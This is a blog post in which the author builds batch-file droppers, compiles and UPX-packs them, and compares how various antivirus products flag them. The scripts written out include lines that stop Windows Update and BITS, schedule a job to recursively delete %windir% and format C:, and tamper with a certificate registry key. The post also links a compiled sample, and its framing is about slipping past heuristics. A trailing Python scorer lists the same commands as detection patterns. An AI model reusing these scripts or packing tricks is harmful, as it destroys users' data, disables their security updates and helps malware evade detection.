Hello to all!
I hope the previous reviews seemed interesting to someone. We continue! Today I thought for a long time about what to write. There were no ideas, apart from a small grudge against Kaspersky Lab, but that is unimportant and almost intimately personal.
So, today I want to give the heuristics of some antiviruses a good poke in a sensitive spot. You can try this at home! ;) As usually happens, the results were surprising.
What we need:
1. Notepad (the plain Windows text editor).
2. Quick Batch Compiler.
3. UPX.
So, create this bat file:
md "%temp%\123456"
echo rem reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F190D1C02C9AF8AB7AA6973C918A4E0836BDE847 /v Blob /t REG_BINARY /d 00 > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"
Why I chose this particular registry key - let it remain a mystery. I will say this much: the emphasis was on Kaspersky. Googling it, yes, will turn it up :)
Compile it into an exe with Quick Batch Compiler, then pad the file with junk (upx.exe itself will do) and pack it with UPX.
Now let's see what the vendors think of the dummy. I hope everyone noticed the rem in the file and has no doubt that it is a dummy? As expected,
only Avira complained, which is in its character. Kaspersky did not live up to my hopes and looks good.

Complicate the task:
md "%temp%\123456"
echo rem net stop wuauserv > "%temp%\123456\1.bat"
echo rem net start wuauserv >> "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"
and we immediately get an additional "wow" from Symantec.

We start to grow up - the rem disappears, but the services are still only juggled (stopped and started again):
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net start wuauserv >> "%temp%\123456\1.bat"
echo net stop BITS >> "%temp%\123456\1.bat"
echo net start BITS >> "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"
But the antiviruses are absolutely indifferent to this - the picture is the same.
We kill the services, potentially opening holes in the machine:
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net stop BITS >> "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"
The antiviruses don't care either way.
All right, enough laughing - jokes aside:
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net stop BITS >> "%temp%\123456\1.bat"
echo rd %windir% /s /q >> "%temp%\123456\1.bat"
echo format c: >> "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"
The compiled file of this stuff is here (password: virus).
And now the funniest thing: my local CIS 2010 gave this alert:

However, on VT Kaspersky is as silent as a Moldovan partisan, and the most interesting picture is with the other antiviruses: even the couple of detections that exist are signature-based, not heuristic (heur, gen, suspicious, etc.).
It is enough to rem out the dangerous code (here is the compiled file, the password is the same): Kaspersky is silent (honor and praise! Clever!), but the other antivirus programs still see a threat, which is actually garbage.
But it gets much more interesting when I try to scan and disinfect the file with Kaspersky. To begin with, there were two detections: one from the scanner and one from the resident monitor. Then begins the "battle of the titans" within one camp. As a result, we see the following:

(hmm, removing the task, starting the service and deleting the file requires a reboot? well, maybe....)

(380 what? Degrees in a circle? Or scary characters in my bat file?)

(so, disinfected or not???)
But in the end it is all over, and sweetheart CIS 2010 says there are no active threats. The danger has passed! ;)
So here is what I concluded for myself.
1. A detection on VT, and even more so a heur, gen, suspicious, etc. one, is far from proof that a file is malware. We looked at minimal code, and it already caused such fear; what will happen with a serious program?
2. Kaspersky's heuristics understand what is a remark and what is active code. Others - not so much :)
3. Avira was paranoid - and still is. On the other hand, it detects a lot of viruses, even more than actually exist :)
4. KIS 2010, with all its charms and pluses, is a very important product. Looking forward to 2011!! (although there is little hope; better that they do not find my requests yet).
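As an added illustration of the rem-versus-active-code distinction discussed above (my own example, not code from the post or from any vendor): a toy static scorer that ignores commented-out batch lines, unwraps the `echo ... >> 1.bat` lines the post uses to build its second script, and weights only the commands that would actually run. The indicator patterns, weights and sample scripts are constructed assumptions.

```python
import re

# Constructed indicators (pattern, label, weight); the list and weights are
# my assumptions for illustration, not any vendor's real rules.
INDICATORS = [
    (r"\bnet\s+stop\s+(wuauserv|bits)\b", "stops Windows Update/BITS service", 2),
    (r"\brd\b.*%windir%.*/s", "recursive delete of %windir%", 5),
    (r"\bformat\s+[a-z]:", "formats a drive", 5),
    (r"\breg\s+add\b.*\\SystemCertificates\\", "writes to certificate store", 3),
    (r"^at\s+\d{1,2}:\d{2}\b", "schedules a job with at", 1),
]

def strip_comment(line):
    """Return the active text of a batch line, or '' if it is a rem/:: comment."""
    s = line.strip()
    return "" if re.match(r"^(rem\b|::)", s, re.I) else s

def active_commands(script):
    """Return the commands that would actually execute. An `echo <cmd> >> file`
    line is unwrapped so the written payload is inspected, and a payload that
    itself starts with rem is dropped like any other comment."""
    cmds = []
    for raw in script.splitlines():
        s = strip_comment(raw)
        if not s:
            continue
        m = re.match(r"^echo\s+(.*?)\s*>>?\s*\S", s, re.I)
        payload = strip_comment(m.group(1)) if m else s
        if payload:
            cmds.append(payload)
    return cmds

def score(script):
    """Sum indicator weights over active commands only; return (total, labels)."""
    total, labels = 0, []
    for cmd in active_commands(script):
        for pat, label, w in INDICATORS:
            if re.search(pat, cmd, re.I):
                total, labels = total + w, labels + [label]
    return total, labels

# Constructed samples mirroring the post's rem'd dummy and its live variant.
DUMMY = r'''md "%temp%\123456"
echo rem net stop wuauserv >> "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"'''

LIVE = r'''md "%temp%\123456"
echo net stop wuauserv >> "%temp%\123456\1.bat"
echo net stop BITS >> "%temp%\123456\1.bat"
echo rd %windir% /s /q >> "%temp%\123456\1.bat"
echo format c: >> "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"'''

if __name__ == "__main__":
    print("dummy:", score(DUMMY))  # (1, ['schedules a job with at'])
    print("live:", score(LIVE))    # total 15
```

The dummy scores only for the scheduled job, while the live script scores for every command it writes; a heuristic that did not strip `rem` would score both identically, which is the behaviour the post observed in most engines.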